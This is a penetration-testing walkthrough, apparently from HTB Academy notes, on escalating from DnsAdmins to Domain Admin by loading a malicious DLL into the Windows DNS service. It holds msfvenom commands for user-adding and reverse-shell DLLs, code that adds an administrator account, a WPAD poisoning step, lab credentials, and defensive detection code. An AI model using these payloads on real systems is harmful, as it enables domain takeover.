DnsAdmins group members have access to DNS information and can manipulate DNS service configuration. Since the Windows DNS service runs as NT AUTHORITY\SYSTEM, membership in this group can be leveraged for privilege escalation on Domain Controllers or dedicated DNS servers through custom DLL plugin injection.
### Key attack components

- DNS management performed over RPC
- ServerLevelPluginDll registry key allows custom DLL loading
- Zero verification of DLL path or content
- DNS service restart loads the custom DLL as SYSTEM
- Full path specification required for successful exploitation

### Attack workflow

- Generate malicious DLL (msfvenom or custom code)
- Host DLL on accessible network share or local path
- Configure ServerLevelPluginDll registry key via dnscmd
- Restart DNS service to trigger DLL loading
- Execute payload with SYSTEM privileges
- Clean up registry and restore service
### Verify group membership

```powershell
Get-ADGroupMember -Identity DnsAdmins
```

Expected output:

```
distinguishedName : CN=netadm,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
name              : netadm
objectClass       : user
SamAccountName    : netadm
SID               : S-1-5-21-669053619-2741956077-1013132368-1109
```

Check the current user's groups:

```cmd
whoami /groups
```

Look for:

```
INLANEFREIGHT\DnsAdmins    Group    S-1-5-21-669053619-2741956077-1013132368-1103
```

### Generate the DLL with msfvenom

```bash
# Generate user addition payload
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
```

Expected output:

```
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Payload size: 313 bytes
Final size of dll file: 5120 bytes
Saved as: adduser.dll
```

```bash
# Generate reverse shell DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f dll -o revshell.dll

# Set up listener
nc -lnvp 443
```
### Custom DLL (modified kdns.c)

```c
// Modified kdns.c for command execution.
// kdns.c is the DNS server plugin from the mimikatz source tree; PDB_RECORD and
// klog() come from its headers, so this file is built as part of that project.
DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead)
{
    FILE *kdns_logfile;
    // The DNS service calls this export for every query it handles, running as SYSTEM
    if ((kdns_logfile = _wfopen(L"kiwidns.log", L"a")) != NULL)
    {
        klog(kdns_logfile, L"%S (%hu)\n", pszQueryName, wQueryType);
        fclose(kdns_logfile);
        system("net user hacker P@ssw0rd /add && net localgroup administrators hacker /add");
    }
    return ERROR_SUCCESS;
}
```
### Host the DLL

```bash
# Start Python HTTP server
python3 -m http.server 7777
```

Expected access log:

```
10.129.43.9 - - [19/May/2021 19:22:46] "GET /adduser.dll HTTP/1.1" 200 -
```

### Download to Target

```powershell
# Download DLL to target system
wget "http://10.10.14.3:7777/adduser.dll" -outfile "adduser.dll"

# Alternative with Invoke-WebRequest
Invoke-WebRequest -Uri "http://10.10.15.152:1234/adduser.dll" -OutFile "C:\Users\netadm\Desktop\adduser.dll"
```

Host on an SMB share accessible by the Domain Controller machine account:

```cmd
copy adduser.dll \\fileserver\share\adduser.dll
```

### Configure ServerLevelPluginDll

Attempt DLL loading as a normal user (should fail):

```cmd
dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll
```

Expected failure:

```
DNS Server failed to reset registry property.
    Status = 5 (0x00000005)
Command failed:  ERROR_ACCESS_DENIED
```

Configure the custom DLL path (requires the full path):

```cmd
dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll
```

Expected success:

```
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
```

Use a network share path:

```cmd
dnscmd.exe /config /serverlevelplugindll \\10.10.14.3\share\adduser.dll
```

### Check DNS service permissions

Get the current user's SID:

```cmd
wmic useraccount where name="netadm" get sid
```

Expected output:

```
SID
S-1-5-21-669053619-2741956077-1013132368-1109
```

Check the DNS service permissions using SDDL:

```cmd
sc.exe sdshow DNS
```

Look for RPWP permissions (SERVICE_START and SERVICE_STOP) granted to the user's SID:

```
D:(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;RPWP;;;S-1-5-21-669053619-2741956077-1013132368-1109)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
```
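A defender-side check for the descriptor above, written as an added example (it is not code from the original notes): it parses the DACL from `sc.exe sdshow` output and flags every access-allowed ACE that grants start, stop or reconfigure rights to a trustee outside an assumed baseline of well-known aliases (SYSTEM, Administrators, Server Operators, Interactive, Service). The SID it reports is the one the page shows for netadm.

```python
import re

# Service access rights: SDDL two-letter token -> (mask bit, name) as the Service Control Manager reads them
SERVICE_RIGHTS = {
    "CC": (0x00001, "SERVICE_QUERY_CONFIG"), "DC": (0x00002, "SERVICE_CHANGE_CONFIG"),
    "LC": (0x00004, "SERVICE_QUERY_STATUS"), "SW": (0x00008, "SERVICE_ENUMERATE_DEPENDENTS"),
    "RP": (0x00010, "SERVICE_START"), "WP": (0x00020, "SERVICE_STOP"),
    "DT": (0x00040, "SERVICE_PAUSE_CONTINUE"), "LO": (0x00080, "SERVICE_INTERROGATE"),
    "CR": (0x00100, "SERVICE_USER_DEFINED_CONTROL"), "SD": (0x10000, "DELETE"),
    "RC": (0x20000, "READ_CONTROL"), "WD": (0x40000, "WRITE_DAC"), "WO": (0x80000, "WRITE_OWNER"),
}
# Rights that let a trustee restart or reconfigure the service, and so get a plugin DLL loaded
SENSITIVE = {"SERVICE_START", "SERVICE_STOP", "SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER"}
# Assumed baseline: the well-known aliases in the captured descriptor (SYSTEM, Administrators, Server Operators, Interactive, Service)
EXPECTED_TRUSTEES = {"SY", "BA", "SO", "IU", "SU"}

def decode_rights(token):
    """Expand an SDDL rights field (two-letter tokens or a hex mask) into right names."""
    if token.startswith("0x"):
        mask = int(token, 16)
        return {name for bit, name in SERVICE_RIGHTS.values() if mask & bit}
    return {SERVICE_RIGHTS.get(token[i:i + 2], (0, token[i:i + 2]))[1] for i in range(0, len(token), 2)}

def parse_dacl(sddl):
    """Return (trustee, rights) for every access-allowed ACE in the DACL of an SDDL string."""
    match = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not match:
        raise ValueError("descriptor has no DACL")
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", match.group(1)):
        fields = ace.split(";")
        if len(fields) < 6:
            raise ValueError("malformed ACE: " + ace)
        if fields[0] == "A":  # deny (D) and audit (AU) ACEs are not grants
            aces.append((fields[5], decode_rights(fields[2])))
    return aces

def unexpected_service_grants(sddl):
    """ACEs giving a non-baseline trustee the right to start, stop or reconfigure the service."""
    findings = []
    for trustee, rights in parse_dacl(sddl):
        hits = sorted(rights & SENSITIVE)
        if hits and trustee not in EXPECTED_TRUSTEES:
            findings.append({"trustee": trustee, "rights": hits})
    return findings

# Descriptor captured from `sc.exe sdshow DNS` above; the last allow ACE is the one the attack relies on
DNS_SDDL = ("D:(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
            "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)"
            "(A;;RPWP;;;S-1-5-21-669053619-2741956077-1013132368-1109)"
            "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
```

Run it over the output of `sc.exe sdshow DNS` from each DNS server; any finding is a principal that can restart the service outside the Administrators and Server Operators groups.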
### Restart the DNS service

Stop the DNS service:

```cmd
sc stop dns
```

Expected output:

```
SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
```

Start the DNS service (triggers DLL loading):

```cmd
sc start dns
```

Expected output:

```
SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        PID                : 6960
```

Check if the user was added to Domain Admins:

```cmd
net group "Domain Admins" /dom
```

Expected result:

```
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            netadm
```

### HTB Academy lab walkthrough

- Credentials: netadm:HTB_@cademy_stdnt!
- Access Method: RDP
- Objective: Leverage DnsAdmins membership to escalate privileges and retrieve flag

```bash
# Example target IP from HTB Academy
xfreerdp /v:10.129.43.42 /u:netadm /p:'HTB_@cademy_stdnt!'
```

Expected output:

```
[16:18:25:879] [4321:4323] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state
[16:18:25:880] [4321:4323] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr
[16:18:25:880] [4321:4323] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpsnd
[16:18:25:880] [4321:4323] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
```
Generate the DLL that adds netadm to Domain Admins:

```bash
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
```

Expected output:

```
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 313 bytes
Final size of dll file: 8704 bytes
Saved as: adduser.dll
```

Start a Python HTTP server on Pwnbox:

```bash
python3 -m http.server 7777
```

Expected output:

```
Serving HTTP on 0.0.0.0 port 7777 (http://0.0.0.0:7777/) ...
```

From the RDP session, open PowerShell and download adduser.dll:

```powershell
wget "http://10.10.14.80:7777/adduser.dll" -outfile "adduser.dll"

# Verify download
ls
```

Expected output:

```
    Directory: C:\Users\netadm

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-r---          5/19/2021  1:38 PM                Videos
-a----          10/3/2022  9:03 AM           8704 adduser.dll
```

Open Command Prompt from the RDP session and load the malicious DLL via dnscmd:

```cmd
dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\adduser.dll
```

Expected success message:

```
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
```

Stop the DNS service:

```cmd
sc stop dns
```

Expected output:

```
SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x1
        WAIT_HINT          : 0x7530
```

Start the DNS service (triggers DLL execution):

```cmd
sc start dns
```

Expected output:

```
SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 6460
        FLAGS              :
```

Check Domain Admins group membership:

```cmd
net group "Domain Admins" /dom
```

Expected result (netadm should be added):

```
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            netadm
The command completed successfully.
```

Sign out from the current RDP session and reconnect with the same credentials. This step is important to refresh the session with the new Domain Admin privileges:

```bash
xfreerdp /v:10.129.43.42 /u:netadm /p:'HTB_@cademy_stdnt!'
```

Open Command Prompt with Domain Admin privileges and access the flag file:

```cmd
type C:\Users\Administrator\Desktop\DnsAdmins\flag.txt
```

Submit the flag content to HTB Academy.

### Success indicators

- ✅ DLL Generation: 8704 bytes adduser.dll created successfully
- ✅ HTTP Server: Python server serving on port 7777
- ✅ DLL Download: adduser.dll present in C:\Users\netadm\
- ✅ Registry Configuration: "Registry property serverlevelplugindll successfully reset"
- ✅ DNS Service Restart: Both stop and start commands complete successfully
- ✅ Privilege Escalation: netadm appears in Domain Admins group
- ✅ Administrator Access: Can read files in C:\Users\Administrator\Desktop\DnsAdmins\
### Alternative payloads

```bash
# Generate DLL for direct access
msfvenom -p windows/x64/exec cmd='copy c:\Users\Administrator\Desktop\DnsAdmins\flag.txt c:\Users\netadm\Desktop\flag.txt' -f dll -o getflag.dll

# Generate DLL to enable RDP for netadm
msfvenom -p windows/x64/exec cmd='net localgroup "Remote Desktop Users" netadm /add' -f dll -o rdp.dll
```

### WARNING: This is a destructive attack

- Only perform with explicit client permission
- DNS service disruption affects entire domain
- Always have cleanup plan ready
- Document all changes made

### Cleanup

Check if the ServerLevelPluginDll key exists:

```cmd
reg query \\[DC_IP]\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters
```

Look for:

```
ServerLevelPluginDll    REG_SZ    adduser.dll
```

Delete the malicious registry entry:

```cmd
reg delete \\[DC_IP]\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll
```

Confirm deletion:

```
Delete the registry value ServerLevelPluginDll (Yes/No)? Y
The operation completed successfully.
```

Restart the DNS service cleanly and verify it is running:

```cmd
sc.exe start dns
sc query dns
```

Expected output:

```
SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
```

Test DNS resolution to verify DNS is working correctly:

```cmd
nslookup localhost
nslookup domain.com
```
### WPAD attack via DnsAdmins

```powershell
# Disable global query block list
Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local

# Add WPAD record pointing to attack machine
Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3
```

```bash
# Set up Responder for traffic capture
responder -I eth0 -A
```

```powershell
# Alternative: Use Inveigh
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y
```
### Detection and defense

Monitor for registry changes to:

```
HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll
```

Event IDs to watch:

- Event ID 4657 - Registry value modified
- Event ID 4656 - Handle to object requested

Suspicious activities:

- DNS service stops/starts outside maintenance windows
- dnscmd.exe execution by non-administrative users
- Custom DLL files in DNS-related directories
- Network connections from DNS service process

Traffic patterns:

- HTTP requests for DLL files from Domain Controllers
- SMB connections to unusual shares
- DNS queries to non-standard records (WPAD)

Regular audits:

- Review DnsAdmins group membership quarterly
- Remove unnecessary accounts
- Implement least-privilege principles
- Use dedicated DNS management accounts

Security measures:

- Enable DNS audit logging
- Monitor ServerLevelPluginDll registry key
- Implement application whitelisting
- Restrict DNS service permissions

Deploy monitoring for:

- DnsAdmins group modifications
- dnscmd.exe execution
- DNS service restart events
- Custom DLL loading by DNS service
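Correlating the monitoring points above into one rule, as an added example that is not part of the original notes: the event records are constructed (not real logs) in the shape a SIEM would normalise them into, and the rule pairs a write to ServerLevelPluginDll with a DNS service restart on the same host inside an assumed 15-minute window, using the preceding dnscmd.exe process-creation event to name the operator. Hostnames, timestamps and the 7036 field layout are assumptions.

```python
from datetime import datetime, timedelta

PLUGIN_VALUE = "ServerLevelPluginDll"
DNS_PARAMS_KEY = r"\services\dns\parameters"   # matched case-insensitively against the object path
WINDOW = timedelta(minutes=15)                   # assumed correlation window

# Constructed sample events (not real logs). Because dnscmd talks to the DNS server over RPC,
# the registry write is performed by the DNS service itself as SYSTEM, so the 4657 subject is
# not the operator; the 4688 for dnscmd.exe just before it is what names the account.
EVENTS = [
    {"time": "2021-05-19T19:25:02", "host": "DC01", "id": 4688, "user": r"INLANEFREIGHT\netadm",
     "process": r"C:\Windows\System32\dnscmd.exe"},
    {"time": "2021-05-19T19:25:03", "host": "DC01", "id": 4657, "user": r"NT AUTHORITY\SYSTEM",
     "object": r"\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters",
     "value": PLUGIN_VALUE, "new_value": r"C:\Users\netadm\adduser.dll"},
    {"time": "2021-05-19T19:26:10", "host": "DC01", "id": 7036, "service": "DNS Server", "state": "stopped"},
    {"time": "2021-05-19T19:26:15", "host": "DC01", "id": 7036, "service": "DNS Server", "state": "running"},
    # A plugin write that has not (yet) been activated by a restart: the DLL loads on the next start
    {"time": "2021-05-19T21:40:00", "host": "DC02", "id": 4657, "user": r"NT AUTHORITY\SYSTEM",
     "object": r"\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters",
     "value": PLUGIN_VALUE, "new_value": r"\\10.10.14.3\share\adduser.dll"},
    # Routine restart with no plugin change: must not alert
    {"time": "2021-05-19T03:00:00", "host": "DC03", "id": 7036, "service": "DNS Server", "state": "running"},
]

def ts(event):
    return datetime.fromisoformat(event["time"])

def is_plugin_write(event):
    return (event["id"] == 4657 and event.get("value") == PLUGIN_VALUE
            and DNS_PARAMS_KEY in event.get("object", "").lower())

def detect_plugin_loads(events):
    """One alert per ServerLevelPluginDll write; critical if the DNS service restarted within WINDOW."""
    alerts = []
    for write in filter(is_plugin_write, events):
        same_host = [e for e in events if e["host"] == write["host"]]
        t0 = ts(write)
        restarted = any(e["id"] == 7036 and e.get("service") == "DNS Server" and e.get("state") == "running"
                        and t0 <= ts(e) <= t0 + WINDOW for e in same_host)
        operators = [e["user"] for e in same_host if e["id"] == 4688
                     and e.get("process", "").lower().endswith("dnscmd.exe")
                     and t0 - WINDOW <= ts(e) <= t0]
        alerts.append({"host": write["host"], "dll": write["new_value"],
                       "severity": "critical" if restarted else "high",
                       "operator": operators[-1] if operators else None})
    return sorted(alerts, key=lambda a: a["host"])
```

A "high" alert means the DLL path is staged and will load at the next restart, so removing the value before the service cycles prevents execution; "critical" means the service has already started with it.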
### Engagement checklist

Pre-attack:

- DnsAdmins membership verified
- DNS service permissions confirmed (RPWP)
- Domain Controller access available
- Client permission obtained for destructive testing
- Malicious DLL created (msfvenom or custom)
- Payload tested in lab environment
- Hosting method prepared (HTTP/SMB)
- Full path available for DLL specification

Execution:

- Registry key configured (`dnscmd /config /serverlevelplugindll`)
- DNS service stopped (`sc stop dns`)
- DNS service started (`sc start dns`)
- Privilege escalation verified (group membership/access)
- Administrator access confirmed
- Flag file accessed (`c:\Users\Administrator\Desktop\DnsAdmins\flag.txt`)
- Flag content extracted and submitted

Cleanup:

- Registry key removed (ServerLevelPluginDll)
- DNS service restored (clean restart)
- DNS functionality verified (nslookup tests)
- Changes documented for client reporting

### Key takeaways

- DnsAdmins membership enables SYSTEM-level code execution on DNS servers
- Custom DLL injection through ServerLevelPluginDll registry key
- DNS service restart required to trigger malicious DLL loading
- Full path specification mandatory for successful exploitation
- Destructive nature requires careful coordination with client
- Domain Controller impact: DNS disruption affects entire domain
- Multiple attack vectors: user addition, reverse shells, WPAD attacks
- Cleanup essential: registry restoration and service stability

DnsAdmins group privilege escalation represents one of the most powerful Windows built-in group attacks, capable of achieving Domain Admin privileges through DNS service manipulation.